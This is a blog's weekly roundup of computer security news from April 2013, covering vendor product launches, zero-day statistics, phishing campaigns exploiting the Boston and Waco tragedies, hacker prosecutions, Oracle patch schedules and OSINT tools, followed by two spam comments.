Computer Security Updates Week 3 of Apr 2013

Refer to Computer Security Updates Week 2 of Apr 2013; in which the biggest news was Microsoft having issued 9 fixes covering a total of 14 vulnerabilities.

For this week, here are the biggest news.
  • Barracuda drives into DC market with 'Unified Platform'.
  • McAfee delivers enterprise class security to the cloud.
  • Cyber-Ark: privileged account exploitation to advanced cyber attacks.
  • Android Devices Now Better Protected with Sophos Mobile Security App.
  • Symantec publishes 2013 Q1 Zero-Day vulnerabilities.
  • Sophos reported that hackers are exploiting Waco explosion news to spread malware.
  • Sophos reported that Ex-employee hacked into Hostgator after being sacked.
  • Reuters reported that U.S. Air Force cadets win cyber war game with NSA hackers.
  • Kaspersky analyzes Boston aftermath.
  • F-Secure‘s Hackathon 2013: Young developer Tan Kok Boon Won The Most Innovative Application’ .
  • Reuters reported that LulzSec hacker receives year in prison for Sony breach.
  • Reuters reported that House (US) passes cybersecurity bill as privacy concerns linger.
  • CA World 2013: The key to mobile security is identity.
  • Oracle to release 128 security patches, hundreds of products affected.
  • Bit9 - Marc Bleicher talks about the influence of OSINT as The Foundation for Social-engineering and Phishing Attacks.

KUALA LUMPUR, Malaysia, 26 April 2013 – Barracuda Drives Into DC market with 'Unified Platform'

Barracuda Networks Inc., a leading provider of security, networking and data protection solutions, today announced the launch of its new Application Delivery Controller (ADC) for Data Centres’. The launch marks Barracuda’s first entry into the ADC space.

ADC is an integrated solution that combines load balancing, application acceleration, application control, and web application security into a single, high-performance platform.

Thiban Darmalingam,
Regional Manager for Barracuda in Malaysia.

“Over the years our customers had been voicing their wish for an integrated platform that both secures their applications and optimises performance. Until now, customers who wanted to do that were faced with very high costs and unnecessary complexity,” said Thiban Darmalingam, the Regional Manager for Barracuda in Malaysia.

Get more details.

SANTA CLARA, Calif. / SG — April 26, 2013 – McAfee Delivers Enterprise Class Security to the Cloud

Just this week, a simple hack to gain access to Associated Press’ twitter account wiped out $136 billion in market value due to an erroneous post triggering a stock- market decline.

In front of this backdrop, McAfee today announced that it is venturing into a new business area with the addition of identity and access management solutions to its Security Connected portfolio. These new solutions include McAfee Cloud Single Sign On and McAfee One Time Password.

Additionally, McAfee also introduced a new McAfee Identity Center of Expertise, staffed with experts in identity and cloud security to assist users with questions pertaining to identity and access management issues, such as architecture requirements and best practices.

This global announcement is particularly significant because:
  1. As more organisations commission cloud based applications like Dropbox to Microsoft 365 or, providing secure access to those services gets more complex - but should not slow down deployment or reduce actual usage. At the same time, most apps still have a basic identification procedure with simple user name and password - that is like building the best secured fortress, but giving a simple key to your backdoor to hundreds of people and one lost key would give access
  2. The move signifies McAfee's ambition to extent its market leadership position. This solution will add to McAfee's portfolio to fuel further growth globally and in Asia Pacific. McAfee is not trying to ‘boil the ocean’ instead they are focusing on several identity-related ‘hot spots’ and investing to help our customers solve critical challenges (in a way that traditional solutions cannot) and maintain business continuity and agility.
  3. This solutions aims to overcome the challenge of managing a simple and convenient access to business relevant application while creating secure and efficient security solutions in more complex IT environments - especially accelerated by the use of mobile devices (bring your own device - BYOD)

Get more details.

Singapore. April 26, 2013 – New Report Connects Privileged Account Exploitation to Advanced Cyber Attacks

Organisations can significantly reduce the threat of targeted attacks by proactively securing privileged accounts, according the first APT Privileged Account Exploitation research report. Compiled by CyberSheath’s advanced security investigations team and commissioned by Cyber-Ark, the report reveals that the theft, misuse and exploitation of privileged accounts is a key tactic in each phase of an Advanced Persistent Threat (APT) attack cycle.

Example of privileged accounts are default login accounts for servers, routers and etc - most of the time, these logins come with default factory settings.

Best Practices for Preventing APT Privileged Account Compromise
  • Isolate, monitor and control every access point to all critical business systems
  • Change default passwords on all servers, databases, applications and network devices
  • Remove hard-coded passwords from scripts, configuration files and applications
  • Employ technical means of automatically enforcing enterprise password policies
  • Control access by enforcing least privilege
  • Use multifactor authentication for access to privileged accounts
  • Increase password complexity
  • Use a unique password for each local administrator account
  • Remove local administrator rights from the majority of users
  • Reduce the number of privileged domain-wide service accounts
  • Automatically change passwords on a periodic basis and immediately upon suspicion of misuse
  • Monitor and record all activities associated with administrative and privileged accounts
  • Implement tamper-proof logging, auditing, and alerting on privileged access

Get more details.

KL, April 24, 2013 - Android Devices Now Better Protected from Malware and Spam with Latest Free Version of Sophos Mobile Security App

To help combat this growing threat, Sophos has introduced the latest version of its free Android security app, Sophos Mobile Security. Sophos Mobile Security now includes SPAM filter capabilities for text messages and calls. The filter rules can block specific phone numbers and calls with a hidden caller ID, as well as text messages with potential malicious URLs. Every incoming call or text message is scanned by the app’s Spam Protection feature and the active filter rules are applied successively. Blocked calls and text messages are logged in the Quarantine folder, where they can be restored as needed.

Sophos Mobile Security is offered for free in its stand-alone version at Google Play. Additionally, Sophos Mobile Security integrates into the company’s flagship mobile device management and security solution, Sophos Mobile Control, providing full administrator management and compliance enforcement.

Get more details.

Symantec, Apr 23, 2013 - 2013 Q1 Zero-Day Vulnerabilities

Symantec observed 11 zero-day vulnerabilities exploited in the first three months of 2013 affecting Oracle Java, Adobe Flash, Adobe Reader, and Microsoft Internet Explorer, which is quite high.

Trends observed.
  • Increased in exploitation of zero-days.
  • Sandbox protection exploitation directly from visiting web sites which host exploits through web browsers.

Oracle has recently published 128 security patches for hundreds of products. There is no information to match security patches with CVEs, hence end-users just have to apply latest updates as soon as possible.

Get more details.

Kuala Lumpur, Malaysia, April 22, 2013 – Warning! Hackers are exploiting Waco explosion news to spread malware

Once again, cybercriminals are leaping at the opportunity to take advantage of breaking news stories to spread malware. The latest example, coming just days after malware authors exploited interest in the Boston Marathon bombings, concerns the fatal explosion in Waco, Texas, of a fertiliser plant.

Malicious emails intercepted by SophosLabs with the subject line "CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas" which contain Redkit exploit kit capable of taking advantage of vulnerabilities on visiting PCs in order to infect them with malware.

The Redkit exploit kit uses a PHP shell hosted on compromised websites to run its operations. Firstly, Redkit bounces first level redirects to the next compromised server, and then malicious content delivering PDF or JAR (Java Archive) exploits are served up from a command & control server.

Sophos protects against the attack, detecting the injected malicious iFrames as Troj/ExpJS-II and Troj/Iframe-JG.

Sophos, Apr 21, 2013 - Hosting company Hostgator hacked, suspect arrested after being "rooted with his own rootkit"

Sophos reported that an ex-employee of Hostgator was arrested for hacking into his former employer's network.

Court documents allege that after Eric Gunnar Grisse, 29, got the sack from his job at Hostgator, he jumped right back into the company's network, using a backdoor Trojan he had planted earlier.

Get more details.

Reuters, HANOVER, Maryland, Fri Apr 19, 2013 - U.S. Air Force cadets win cyber war game with NSA hackers

Reuters reported a U.S. Air Force Academy team on Friday beat out rivals from other elite military colleges after a three-day simulated cyber "war" against hackers from the National Security Agency that is meant to teach future officers the importance of cybersecurity.

Nearly 60 government experts - sitting under a black skull and crossbones flag - worked around the clock this week to break into computer networks built by students at the Air Force, Army, Navy, Coast Guard and Merchant Marine academies. Two military graduate schools also participated.

Get more details.

PETALING JAYA, April 19, 2013 – Kaspersky Analyzes Boston Aftermath

While many are still in shock after the Boston Marathon bombings on 16 April, it didn’t take long for cyber criminals to abuse that tragic incident for their dirty deeds.

Emails related to Boston Aftermath

Emails containing links to malicious locations with names like “news.html” were intercepted. These pages contain URLs of non-malicious youtube clips covering the recent event. After a delay of 60 seconds, another link leading to an executable file is activated.

Kaspersky Lab detects this threat as “Trojan-PSW.Win32.Tepfer'.

Kuala Lumpur, Apr 18, 2013 - F-Secure‘s Hackathon 2013: Young developer Tan Kok Boon Won The Most Innovative Application’

F-Secure Malaysia’s Hackathon 2013 which was conducted on Apr 12, 2013 attracted more than 30 talented Malaysian developers to compete in a 30-hour challenge as they networked with other developers. The event has given them the opportunity to learn about F-Secure’s APIs and security systems and to develop innovative applications for better online security.

Prizes were awarded to three applications. Lee Swee Meng won the award for ‘The Most Unexpected Demo Effect’ with his 3D Globe application, followed by duo Fatin Ruzanna and Francis Fueconcillo, who walked away with the award for ‘The Best Use of F-Secure’s APIs (Application Programming Interface). The duo amazed the crowd with their application which integrated F-Secure’s APIs with Twitter, allowing users to avoid malicious tweets on the social networking platform.

F-Secure Hackathon 2013's participants

Finally, young developer Tan Kok Boon stole the spotlight with his groundbreaking application which allows users to monitor and prevent threats using F-Secure’s World Map Interface. Tan won the award for ‘ The Most Innovative Application’ and the award for ‘The Best Overall Performance’ which entitles him to a luxurious dinner with Mikko Hyppönen, internationally acclaimed Computer Security Expert, Columnist, Malware Researcher and Chief Research Officer (CRO) of F-Secure Corporation.

Get more details.

Reuters, Apr 18, 2013 - LulzSec hacker receives year in prison for Sony breach

Reuters reported that a hacker who pleaded guilty last year to taking part in an extensive computer breach of Sony Pictures Entertainment was sentenced on Thursday in Los Angeles to a year in prison, followed by home detention, federal prosecutors said.

Kretsinger, 25, was also ordered by a U.S. district judge in Los Angeles to perform 1,000 hours of community service after his release from prison, said Thom Mrozek, spokesman for the U.S. Attorney's Office in Los Angeles.

Get more details.

Reuters, Apr 18, 2013 - House (US) passes cybersecurity bill as privacy concerns linger

Obama had threatened to veto it. The House of Representatives passed legislation on Thursday designed to help companies and the government share information on cyber threats, though concerns linger about the amount of protection the bill offers for private information.

The bill proposed more elaborated sharing of cyber threats data between private and public sectors.

Some lawmakers and privacy activists worry that the legislation would allow the government to monitor citizens' private information and companies to misuse it.

Get more details.

CA Blogs, Apr 18, 2013 - CA World 2013: The key to mobile security is identity

Jeff Broberg stressed that mobility (security) starts and ends with Identity.

Get more details.

ZDNet, Apr 16, 2013 - Oracle to release 128 security patches, hundreds of products affected

ZDNet reported that Oracle will later release 128 fixes for security vulnerabilities that affect "hundreds" of its products.

The total of 128 security patches cover product areas for Database, Supply Chain, Fusion Middleware, E-Business Suite, Peoplesoft, Siebel, Retail, Health Sciences, Oracle Flexcube,Primavera, Oracle & Sun System Product Suite, MySQL Product Suite, Oracle Support Tools.

Critical Patch Updates are released on the Tuesday closest to the 17th day of January, April, July and October. The next four dates are:
  • 16 July 2013
  • 15 October 2013
  • 14 January 2014
  • 15 April 2014

Get more details.

Bit9 Blog, Apr 15, 2013 - Marc Bleicher talks about the influence of OSINT as The Foundation for Social-engineering and Phishing Attacks

In a nutshell, Open-source intelligence refers to finding and analyzing information from any source that is publicly available.

Marc explained that government agencies have been using OSINT to gather information for conducting reconnaissance since the Internet age.

Two tools are useful in performing OSINT; 1.) Maltego which is capable of gathering information pertaining to relationships between people, organizations, web sites, Internet infras, Phrases, Affiliations, Documents and files; 2.) FOCA 3.2, a free fingerprinting and information-gathering tool that can search for servers, domains, URLs and public documents and which outputs everything into a network tree.

Granted that OSINT is the first step for cyber attackers to carry out malicious activities, hence OSINT should be regarded as another layer in your overall security stack.


Anonymous said…
Do you mind if I quote a couple of your articles as long as I provide credit and sources back
to your site? My website is in the exact same
area of interest as yours and my visitors would truly benefit from
a lot of the information you provide here. Please let me
know if this ok with you. Regards!

my web blog ...
Anonymous said…
After finalizing transmitted application, the business takes hardly all day and hours to nevertheless be
sent to persons account. Some companies even offer to refinance your existing loan which enables
you a pay off an existing title loan with a new one.

Look at my weblog :: pikavippi 2013